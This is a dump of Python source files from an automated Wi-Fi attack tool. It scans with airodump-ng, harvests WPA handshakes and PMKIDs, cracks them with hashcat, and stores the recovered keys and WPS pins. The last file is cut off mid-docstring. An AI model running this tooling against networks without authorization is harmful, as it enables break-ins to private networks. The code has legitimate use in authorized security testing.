index
int64 | repo_name
string | branch_name
string | path
string | content
string | import_graph
string |
|---|---|---|---|---|---|
34,400
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/discover.py
|
import csv
from wdcs.ap import *
from wdcs.crack import *
from wdcs.basicutils import Logger
class Discover(object):
    """Runs airodump-ng to enumerate nearby APs/stations and opportunistically
    extracts PMKIDs and WPA 4-way handshakes from the resulting capture.

    NOTE(review): time, traceback, Process, Bssid, AirodumpProcess and the
    Available_* classes arrive via the wildcard imports above — presumably
    from wdcs.ap / wdcs.crack; verify before tightening the imports.
    """

    def __init__(self, config, database, crack_utils, file_manager):
        # Collaborators are injected; no I/O happens until the scan methods run.
        self.config = config
        self.db = database
        self.crack_utils = crack_utils
        self.file_manager = file_manager

    def select_accidentally_found_hs_and_pmkid(self, filepath, devices):
        """Inspect pcap *filepath* for EAPOL frames captured incidentally and
        attempt PMKID / 4-way-handshake cracking for matching APs.

        filepath -- pcap file to inspect.
        devices  -- iterable of AP objects, matched by their .bssid attribute.
        """
        pmkid_messages = self.crack_utils.count_pmkid_messages(filepath)
        # msg[0] -> EAPOL message 1 of 4, msg[1] -> 2 of 4, msg[2] -> 3 of 4
        msg = [set(), set(), set()]
        lines = self.crack_utils.read_tshark(filepath, "eapol")
        Logger.log("Found {} accidental eapol messages".format(len(lines)))
        for line in lines:
            cols = line.split("\t")
            if len(cols) == 8:
                # Columns are swapped for "2 of 4" so every tuple has a
                # consistent (addr_a, addr_b) orientation regardless of frame
                # direction — assumes cols[2]/cols[4] are the two 802.11
                # addresses in tshark's tab output; TODO confirm column layout.
                if "2 of 4" in cols[7]:
                    msg[1].add((Bssid.normalize_bssid(cols[4]), Bssid.normalize_bssid(cols[2])))
                elif "1 of 4" in cols[7]:
                    msg[0].add((Bssid.normalize_bssid(cols[2]), Bssid.normalize_bssid(cols[4])))
                elif "3 of 4" in cols[7]:
                    msg[2].add((Bssid.normalize_bssid(cols[2]), Bssid.normalize_bssid(cols[4])))
        # An address that sent message 1 and also shows up in the PMKID scan
        # is a PMKID-crack candidate.
        pmkid_candidates = [m[0] for m in msg[0] if m[0] in pmkid_messages]
        Logger.log("PMKID messages: {}, msg: {}".format(pmkid_messages, msg))
        done = []
        for candidate in pmkid_candidates:
            aps = [ap for ap in devices if ap.bssid == candidate]
            if len(aps) > 0:
                ap = aps[0]
                if not ap.pmkid:
                    try:
                        self.crack_utils.convert_and_crack_pcap_pmkid(ap, filepath)
                    except CrackSuccess:
                        # PMKID secured; remember it so the 4hs pass skips it.
                        done.append(ap.bssid)
                        continue
                else:
                    Logger.log("{} already have PMKID".format(ap.bssid))
        # A pair seen in message 2 plus message 1 or 3 carries enough of the
        # 4-way handshake to attempt a crack.
        for m in msg[1]:
            if (m in msg[0] or m in msg[2]) and m[0] not in done:
                candidate = m[1]
                aps = [ap for ap in devices if ap.bssid == candidate]
                if len(aps) > 0:
                    ap = aps[0]
                    if not ap.hs4:
                        try:
                            filtered_pcap = self.crack_utils.extract_ap_station_communication_from_pcap(filepath, Bssid.make_colon_bssid(m[0]), Bssid.make_colon_bssid(m[1]))
                            self.crack_utils.read_and_crack_handshake(ap, filtered_pcap, None)
                        except CrackSuccess:
                            pass
                    else:
                        Logger.log("{} already have 4hs".format(ap.bssid))

    def __is_ap_collected(self, available, d):
        # True when an AP with d's bssid is already in available["ap"].
        return len([x for x in available["ap"] if x.bssid == d.bssid]) > 0

    def __is_station_collected(self, available, d):
        # True when a station with d's mac is already in available["station"].
        return len([x for x in available["station"] if x.mac == d.mac]) > 0

    def discover_networks(self, available, sleep_seconds):
        """Run airodump-ng for roughly *sleep_seconds* (-1 means a single 30s
        round), merging found APs/stations into *available* and the database.

        Returns the path of the pcap file written by airodump-ng.
        """
        rounds = 0
        update_counter = 0
        sleep = 30  # seconds per scan round
        if sleep_seconds != -1:
            round_limit = sleep_seconds / sleep
            step = 1
        else:
            # step 0 keeps rounds at 0 forever: scan until interrupted.
            round_limit = 1
            step = 0
        Logger.log("Start scanning (sleep {} sec)...".format(sleep_seconds))
        airodump = None
        try:
            airodump = AirodumpProcess(self.config.iface, self.file_manager)
            airodump.wait_for_files()
            while rounds < round_limit:
                try:
                    Logger.log("...scanning...")
                    time.sleep(sleep)
                except KeyboardInterrupt:
                    # Ctrl-C ends the loop after this iteration's bookkeeping.
                    Logger.log("Interrupted by user")
                    rounds = round_limit
                # Collect bssids advertising configured WPS (state == 2).
                pt = Process.start_process_pipe_stdout(
                    ["tshark", "-r", airodump.pcap_filepath, "-Y", "wps.wifi_protected_setup_state == 2",
                     "-T", "fields", "-e", "wlan.bssid"])
                r = Bssid.normalize_bssid(pt.communicate()[0].decode("utf-8"))
                wps_bssids = set(r.split("\n"))
                Logger.log("WPS: " + str(wps_bssids))
                with open(airodump.csv_filepath) as f:
                    f_csv = csv.reader(f, delimiter=",")
                    for line in f_csv:
                        # airodump csv: 15-column rows are APs, 7-column rows
                        # are stations; header rows are skipped by name.
                        if len(line) == 15:
                            if line[0] == "BSSID":
                                continue
                            d = Available_AP_Device(line, wps_bssids)
                            # DB writes are throttled: only every
                            # SQL_DEVICE_UPDATE_THRESHOLD-th round updates
                            # already-known devices.
                            if update_counter == 0 or not self.__is_ap_collected(available, d):
                                new = self.db.update_ap_device(d)
                                if new:
                                    d.new = True
                            if not self.__is_ap_collected(available, d):
                                available["ap"].append(d)
                        elif len(line) == 7:
                            if line[0] == "Station MAC":
                                continue
                            d = Available_Station_Device(line)
                            if update_counter == 0 or not self.__is_station_collected(available, d):
                                self.db.update_station_device(d)
                            if not self.__is_station_collected(available, d):
                                available["station"].append(d)
                rounds += step
                update_counter = (update_counter + 1) % self.config.SQL_DEVICE_UPDATE_THRESHOLD
        except:
            # NOTE(review): bare except — also swallows SystemExit etc.
            Logger.log("Cannot discover networks! {}".format(traceback.format_exc()))
        finally:
            if airodump:
                airodump.kill()
        # NOTE(review): if AirodumpProcess() itself raised, airodump is None
        # here and this line raises AttributeError — confirm intended.
        return airodump.pcap_filepath
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,401
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/additional/hashcat_crack.py
|
# External cracking script, part of https://github.com/mmmds/WirelessDiscoverCrackScan
import datetime
import subprocess
import os
### CONFIGURATION
HASHCAT_DIR = "C:\\hashcat-5.1.0"  # hashcat install directory (Windows path)
HASHCAT_EXE = "hashcat64.exe"      # hashcat binary inside HASHCAT_DIR
LOG_FILE = "crack_log.txt"         # one "<date>/<dict>/<hash file>" record per line
DICT_DIR = "./dicts"               # directory holding the wordlist files
def load_dict_list(dict_dir=None):
    """Return the filenames found directly inside *dict_dir*.

    dict_dir -- directory to list; defaults to the module-level DICT_DIR.
    Returns [] when the directory is missing (the original implicitly
    returned None in that case, breaking iteration downstream).
    """
    if dict_dir is None:
        dict_dir = DICT_DIR
    # The first item os.walk() yields describes the top-level directory.
    for _root, _subdirs, filenames in os.walk(dict_dir):
        return filenames
    return []  # os.walk() yielded nothing: directory does not exist
def parse_log(log_file=None):
    """Parse the crack log into {(hash_file, dict_file): date}.

    Each line looks like "<date>/<dict filename>/<hash file>.<ext>" as
    written by append_log(). log_file defaults to the module-level LOG_FILE.

    Returns {} when the log does not exist yet — the original crashed with
    FileNotFoundError on the very first run, before any log was written.
    """
    if log_file is None:
        log_file = LOG_FILE
    records = {}
    try:
        f = open(log_file, "r")
    except FileNotFoundError:
        return records  # nothing cracked before
    with f:
        for line in f:
            parts = line.split("/")
            if len(parts) < 3:
                continue  # blank or malformed line
            date = parts[0]
            dict_file = parts[1].strip()
            hash_file = parts[2].split(".")[0].strip()
            records[(hash_file, dict_file)] = date
    return records
def append_log(file, dictionary, log_file=None):
    """Append a "<date>/<dictionary>/<file>" record to the crack log.

    file       -- hash file that was processed.
    dictionary -- wordlist filename used.
    log_file   -- log path; defaults to the module-level LOG_FILE
                  (added for symmetry with parse_log and testability).
    """
    if log_file is None:
        log_file = LOG_FILE
    text = "{}/{}/{}".format(str(datetime.datetime.now()), dictionary, file)
    with open(log_file, "a") as f:
        # Leading newline keeps records line-separated without a trailing \n.
        f.write("\n" + text)
def read_files(directory="."):
    """Return ([pmkid basenames], [handshake basenames]) found in *directory*.

    Files ending in .16800 are PMKID hashes; .2500 are hccapx handshakes.
    directory defaults to the current working directory, preserving the
    original behavior while allowing callers/tests to point elsewhere.
    """
    pmkid, hs4 = [], []
    for name in os.listdir(directory):
        base = name.split(".")[0]
        if name.endswith(".16800"):
            pmkid.append(base)
        elif name.endswith(".2500"):
            hs4.append(base)
    return (pmkid, hs4)
def process(files, t, logs, dicts):
    """Run hashcat in mode *t* for every (file, dictionary) pair not yet in
    *logs*, recording each completed run via append_log()."""
    for hash_file in files:
        for dictionary in dicts:
            already_done = (hash_file.split(".")[0], dictionary) in logs
            if already_done:
                print("\n\n-----------{} {} in logs\n\n".format(hash_file, dictionary))
                continue
            print("\n\n######## {} {}\n\n".format(hash_file, dictionary))
            cwd = os.getcwd()
            hashcat_cmd = [
                HASHCAT_DIR + "\\" + HASHCAT_EXE,
                "-m", t,
                "{}\\{}.{}".format(cwd, hash_file, t),
                "{}\\{}\\{}".format(cwd, DICT_DIR, dictionary),
            ]
            # Block until this hashcat run finishes before logging it.
            subprocess.Popen(hashcat_cmd, cwd=HASHCAT_DIR).wait()
            append_log(hash_file, dictionary)
# --- script entry: crack every collected hash against every dictionary ---
files = read_files()      # ([pmkid hash basenames], [handshake basenames])
logs = parse_log()        # (hash, dict) pairs already processed earlier
dicts = load_dict_list()  # wordlist filenames found under DICT_DIR
print(dicts)
print(files)
print(logs)
pmkid = files[0]
hs4 = files[1]
process(pmkid, "16800", logs, dicts)  # hashcat mode 16800 = PMKID
process(hs4, "2500", logs, dicts)     # hashcat mode 2500 = WPA handshake (hccapx)
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,402
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs.py
|
import sys
from wdcs.wdcs import WDCS
def print_usage(script_name=None):
    """Print CLI usage to stdout.

    script_name -- program name shown in the examples; defaults to the
    basename of sys.argv[0]. The original read a global that was assigned
    only inside the __main__ block, so calling this function from an import
    raised NameError.
    """
    if script_name is None:
        script_name = sys.argv[0].split("/")[-1]
    bold = '\033[1m'       # ANSI bold on
    end_bold = '\033[0m'   # ANSI reset
    print(bold + "Wireless Discover Crack Scan" + end_bold + " (v0.1)\n\tmass automated wifi security tool")
    print("Usage:"
          + "\n\t{}{} auto{} - start auto scan".format(bold, script_name, end_bold)
          + "\n\t{}{} manual{} - start interactive scan".format(bold, script_name, end_bold)
          + "\n\t{}{} export OUTPUT_DIR{} - export nmap, psk, dictionary, pmkid and handshakes to files (for cracking)".format(bold, script_name, end_bold)
          + "\n\t{}{} psk ESSID PSK{} - add psk".format(bold, script_name, end_bold)
          + "\n\t{}{} show{} - show all collected info".format(bold, script_name, end_bold)
          )
if __name__ == "__main__":
    # Dispatch on argv: auto / manual / export DIR / psk ESSID PSK / show.
    args = len(sys.argv)
    script_name = sys.argv[0].split("/")[-1]  # read by print_usage()
    if args == 2 and sys.argv[1] == "auto":
        WDCS().start(True)    # fully automatic scan/crack loop
    elif args == 2 and sys.argv[1] == "manual":
        WDCS().start(False)   # interactive scan
    elif args == 3 and sys.argv[1] == "export":
        outdir = sys.argv[2]
        WDCS().export(outdir)
    elif args == 4 and sys.argv[1] == "psk":
        essid = sys.argv[2]
        psk = sys.argv[3]
        WDCS().add_psk(essid, psk)
    elif args == 2 and sys.argv[1] == "show":
        WDCS().print_all()
    else:
        print_usage()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,403
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/database.py
|
from wdcs.ap import *
import sqlite3
class Database(object):
    """SQLite persistence layer (wifi.db) for discovered devices, nmap scan
    output and cracked credentials.

    NOTE(review): Logger, TimeUtils and AP_Device come in through the
    wildcard import from wdcs.ap — presumably re-exported there; verify
    before tightening imports.
    """

    def __init__(self, file_manager):
        # One shared connection; each method commits its own transaction.
        self.con = sqlite3.connect(file_manager.filepath("wifi.db"))
        self.__sql_init()

    def __sql_init(self):
        """Create the schema on first run.

        NOTE(review): the bare except treats any failure as "tables already
        exist", which also hides genuine schema errors.
        """
        try:
            c = self.con.cursor()
            c.execute(
                "CREATE TABLE "
                "ap_devices("
                "bssid TEXT PRIMARY KEY,"
                "first_seen TEXT,"
                "last_seen TEXT,"
                "last_attack TEXT,"
                "power TEXT,"
                "channel TEXT,"
                "privacy TEXT,"
                "cipher TEXT, "
                "auth TEXT, "
                "essid TEXT, "
                "wps INT, "
                "psk TEXT, "
                "wps_pin TEXT, "
                "pmkid TEXT, "
                "wpa_handshake BLOB, "
                "status TEXT "
                ")")
            c.execute(
                "CREATE TABLE station_devices("
                "mac TEXT PRIMARY KEY, "
                "first_seen TEXT, "
                "last_seen TEXT, "
                "bssid TEXT, "
                "essid TEXT"
                ")")
            c.execute(
                "CREATE TABLE scan_results("
                "bssid TEXT, "
                "scan_date TEXT,"
                "content BLOB"
                ")"
            )
            self.con.commit()
        except:
            pass

    def update_station_device(self, device):
        """Insert *device*, or refresh last_seen/bssid/essid if the mac exists."""
        c = self.con.cursor()
        c.execute("SELECT count(*) FROM station_devices WHERE mac = ?", (device.mac,))
        exists = c.fetchone()[0] != 0
        if exists:
            Logger.log("Updating {}".format(device))
            c.execute("UPDATE station_devices SET last_seen = ?, bssid = ?, essid = ? WHERE mac = ?",
                      (device.last, device.bssid, device.essid, device.mac))
            self.con.commit()
        else:
            Logger.log("Adding {}".format(device))
            c.execute("INSERT INTO station_devices (mac, first_seen, last_seen, bssid, essid) values (?, ?, ?, ?, ?)",
                      (device.mac, device.first, device.last, device.bssid, device.essid))
            self.con.commit()

    def update_ap_device(self, device):
        """Insert or refresh an AP row. Returns True iff a new row was added."""
        c = self.con.cursor()
        c.execute("SELECT count(*) FROM ap_devices WHERE bssid = ?", (device.bssid,))
        exists = c.fetchone()[0] != 0
        if exists:
            Logger.log("Updating " + str(device))
            # Only the volatile columns are refreshed on re-discovery.
            c.execute("UPDATE ap_devices SET last_seen = ?, power = ?, channel = ?, wps = ? WHERE bssid = ?",
                      (device.last, device.power, device.channel, device.wps, device.bssid))
            self.con.commit()
            return False
        else:
            Logger.log("Adding " + str(device))
            c.execute(
                "INSERT INTO ap_devices "
                "(bssid, power, first_seen, last_seen, channel, privacy, cipher, auth, essid, wps) "
                "values (?,?,?,?,?,?,?,?,?,?)",
                (device.bssid, device.power, device.first, device.last, device.channel, device.privacy, device.cipher,
                 device.auth, device.essid, device.wps))
            self.con.commit()
            return True

    def update_ap_wps(self, ap, pin, psk):
        """Store a recovered WPS pin / PSK pair for *ap*."""
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET wps_pin = ?, psk = ? WHERE bssid = ?", (pin, psk, ap.bssid))
        self.con.commit()

    def update_ap_pmkid(self, ap, pmkid):
        """Store a captured PMKID for *ap*."""
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET pmkid = ? WHERE bssid = ?", (pmkid, ap.bssid))
        self.con.commit()

    def update_ap_wpa_handshake(self, ap, data):
        """Store captured 4-way-handshake bytes (hccapx blob) for *ap*."""
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET wpa_handshake = ? WHERE bssid = ?", (data, ap.bssid))
        self.con.commit()

    def select_bssids_with_psk(self):
        """Return the list of bssids whose PSK is already known."""
        c = self.con.cursor()
        c.execute("SELECT bssid FROM ap_devices WHERE psk IS NOT NULL")
        rows = c.fetchall()
        rows = [r[0] for r in rows]
        return rows

    def select_bssids_with_pmkid_or_4hs(self):
        """Return bssids that already have crackable material collected."""
        c = self.con.cursor()
        c.execute("SELECT bssid FROM ap_devices WHERE pmkid IS NOT NULL OR wpa_handshake IS NOT NULL")
        rows = c.fetchall()
        rows = [r[0] for r in rows]
        return rows

    def select_psk_for_ap(self, ap):
        """Return the stored PSK for *ap*, or None when unknown."""
        c = self.con.cursor()
        c.execute("SELECT psk FROM ap_devices WHERE bssid = ?", (ap.bssid,))
        rows = c.fetchall()
        if len(rows) > 0:
            return rows[0][0]
        else:
            return None

    def select_psk_for_essid(self, essid):
        """Return all psk rows for *essid* (several APs may share an essid)."""
        c = self.con.cursor()
        c.execute("SELECT psk FROM ap_devices WHERE essid = ?", (essid,))
        rows = c.fetchall()
        return rows

    def check_essid_exists(self, essid):
        """Return True when at least one AP with *essid* is stored."""
        c = self.con.cursor()
        c.execute("SELECT count(*) FROM ap_devices WHERE essid = ?", (essid,))
        row = c.fetchone()
        number = row[0]
        if number == 0:
            return False
        elif number == 1:
            return True
        else:
            # Duplicate essids are allowed but worth flagging.
            Logger.log("There's more than one {}".format(essid))
            return True

    def get_display_devices(self, bssids = None):
        """Return AP_Device display rows, optionally filtered to *bssids*."""
        c = self.con.cursor()
        if bssids:
            # IN clause built from "?" placeholders, one per bssid.
            c.execute("SELECT bssid, essid, power, channel, privacy, first_seen, last_seen, "
                      "psk is not null, wpa_handshake is not null, pmkid is not null, wps, last_attack, status "
                      "FROM ap_devices WHERE bssid IN ({})".format(",".join("?"*len(bssids))), bssids)
        else:
            c.execute("SELECT bssid, essid, power, channel, privacy, first_seen, last_seen, "
                      "psk is not null, wpa_handshake is not null, pmkid is not null, wps, last_attack, status "
                      "FROM ap_devices")
        rows = c.fetchall()
        return [AP_Device(r) for r in rows]

    def insert_scan_result(self, bssid, scan):
        """Store one nmap scan output blob, timestamped now."""
        c = self.con.cursor()
        c.execute("INSERT INTO scan_results (bssid, scan_date, content) VALUES (?,?,?)", (bssid, TimeUtils.now_str(), scan))
        self.con.commit()

    def update_last_attack(self, bssid, status = ""):
        """Record the time (and optional status text) of the latest attack."""
        time = TimeUtils.now_str()
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET last_attack = ?, status = ? WHERE bssid = ?", (time, status, bssid))
        self.con.commit()

    def get_4hs_and_pmkid(self):
        """Return rows with crackable material but no PSK yet."""
        c = self.con.cursor()
        c.execute("SELECT bssid, pmkid, wpa_handshake, essid FROM ap_devices WHERE psk IS NULL AND (pmkid IS NOT NULL OR wpa_handshake IS NOT NULL)")
        rows = c.fetchall()
        return rows

    def update_psk_for_essid(self, essid, psk):
        """Set *psk* on every AP sharing *essid*."""
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET psk = ? WHERE essid = ?", (psk, essid))
        self.con.commit()

    def update_psk_for_bssid(self, bssid, psk):
        """Set *psk* on the single AP identified by *bssid*."""
        c = self.con.cursor()
        c.execute("UPDATE ap_devices SET psk = ? WHERE bssid = ?", (psk, bssid))
        self.con.commit()

    def select_all_psk(self):
        """Return (bssid, essid, psk) for every cracked AP."""
        c = self.con.cursor()
        c.execute("SELECT bssid, essid, psk FROM ap_devices WHERE psk IS NOT NULL")
        rows = c.fetchall()
        return rows

    def get_nmap_results(self):
        """Return all stored (bssid, scan content) pairs."""
        c = self.con.cursor()
        c.execute("SELECT bssid, content FROM scan_results")
        rows = c.fetchall()
        return rows
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,404
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/config.py
|
import configparser
from wdcs.basicutils import Bssid
from wdcs.logger import Logger
import os
class Config(object):
    """Loads cfg.ini (creating it with defaults on first run) and exposes
    settings as attributes."""

    def __init__(self, file_manager):
        """file_manager -- resolves the path of the cfg.ini config file."""
        self.define_const()
        config_path = file_manager.filepath("cfg.ini")
        parser = configparser.ConfigParser()
        default = configparser.ConfigParser()
        script_dir = os.path.dirname(__file__)
        default["DEFAULT"] = {
            "wlan_interface": "wlan0",
            "wlan_client_interface": "wlan1",
            "ap_whitelist": "",
            "interactive": "true",
            "scan_default_sleep_seconds": 600,
            "auto_scan_device_threshold_minutes": 15,
            "hashcat_dictionary": script_dir + "/dict.txt",
            "skip_wps_bruteforce": "false",
            "skip_wps_pixie": "false",
            "skip_pmkid": "false",
            "skip_4hs": "false",
            "crack_in_auto_mode": "true"
        }
        if os.path.exists(config_path):
            Logger.log("Reading config from file")
            parser.read(config_path)
        else:
            Logger.log("Creating default config file")
            with open(config_path, "w") as f:
                default.write(f)
            parser = default
        self.interactive = self.__get_bool(parser, "interactive")
        self.__ap_whitelist = []
        # BUGFIX: the fallback used to be the raw defaults-section value (a
        # str), so a config file missing this key produced a string instead
        # of an int; convert the fallback with getint() like the
        # auto_scan_device_threshold_minutes line below already does.
        self.scan_default_sleep_seconds = parser["DEFAULT"].getint(
            "scan_default_sleep_seconds", default["DEFAULT"].getint("scan_default_sleep_seconds"))
        self.iface = parser["DEFAULT"]["wlan_interface"]
        self.iface_client = parser["DEFAULT"]["wlan_client_interface"]
        self.hashcat_dictionary = parser["DEFAULT"]["hashcat_dictionary"]
        self.skip_wps_bruteforce = self.__get_bool(parser, "skip_wps_bruteforce")
        self.skip_wps_pixie = self.__get_bool(parser, "skip_wps_pixie")
        self.skip_pmkid = self.__get_bool(parser, "skip_pmkid")
        self.skip_4hs = self.__get_bool(parser, "skip_4hs")
        self.auto_scan_device_threshold_minutes = parser["DEFAULT"].getint(
            "auto_scan_device_threshold_minutes", default["DEFAULT"].getint("auto_scan_device_threshold_minutes"))
        self.crack_in_auto_mode = self.__get_bool(parser, "crack_in_auto_mode")
        # Normalize the whitelist; invalid entries (including the empty
        # string from an unset option) are silently dropped.
        for ap in parser["DEFAULT"].get("ap_whitelist", "").split(","):
            bssid = Bssid.normalize_bssid(ap)
            if Bssid.is_bssid(bssid):
                self.__ap_whitelist.append(bssid)

    def __get_bool(self, parser, key):
        # Missing or unrecognized values default to False.
        return parser["DEFAULT"].get(key, "").lower() in ["true", "yes", "1", "y"]

    def define_const(self):
        """Hard-coded tuning constants (not user-configurable)."""
        self.SQL_DEVICE_UPDATE_THRESHOLD = 10
        self.TRIES_PER_STATION = 3
        self.TRIES_LIMIT_NO_DEAUTH = 10
        self.DEAUTH_COUNT_BASE = 5
        self.SLEEP_AFTER_DEAUTH_BASE = 10
        self.SLEEP_NO_DEAUTH = 15

    def is_bssid_legal(self, bssid):
        """Return True when *bssid* passes the whitelist (empty list allows all)."""
        if len(self.__ap_whitelist) > 0:
            return bssid in self.__ap_whitelist
        return True
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,405
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/logger.py
|
import datetime
import logging
import os
import sys
class LoggerImpl(object):
    """Logging facade mirroring every message to stdout and $HOME/.wdcs/log.

    NOTE(review): assumes $HOME is set and ~/.wdcs already exists —
    os.getenv() returns None and FileHandler raises otherwise; confirm the
    directory is created before this module is first imported.
    """

    def __init__(self):
        filename = os.getenv("HOME") + "/.wdcs/log"
        stdout_handler = logging.StreamHandler(sys.stdout)
        file_handler = logging.FileHandler(filename)
        # basicConfig is a no-op if the root logger was configured already.
        logging.basicConfig(handlers=[stdout_handler, file_handler], format="[%(asctime)s] %(message)s", level=logging.DEBUG)

    def log(self, text):
        """Log *text* at INFO level (goes to stdout and the log file)."""
        logging.info(text)

    def print_nolog(self, text):
        """Print *text* to stdout only, bypassing the log file."""
        print(text)

# Module-level singleton, instantiated (and file opened) at import time.
Logger = LoggerImpl()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,406
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/scan.py
|
from wdcs.crack import WpaSupplicant
from wdcs.logger import Logger
from wdcs.process import Process
from wdcs import timeutils
import time
class Nmap(object):
    """Connects to an AP (open or with a cracked PSK) and port-scans it."""

    def __init__(self, config, db, file_manager):
        self.config = config
        self.db = db
        self.file_manager = file_manager

    def __start_nmap(self, ap, ip_cidr, udp, verbose=False):
        """Run one nmap scan of *ip_cidr* and store its output in the DB.

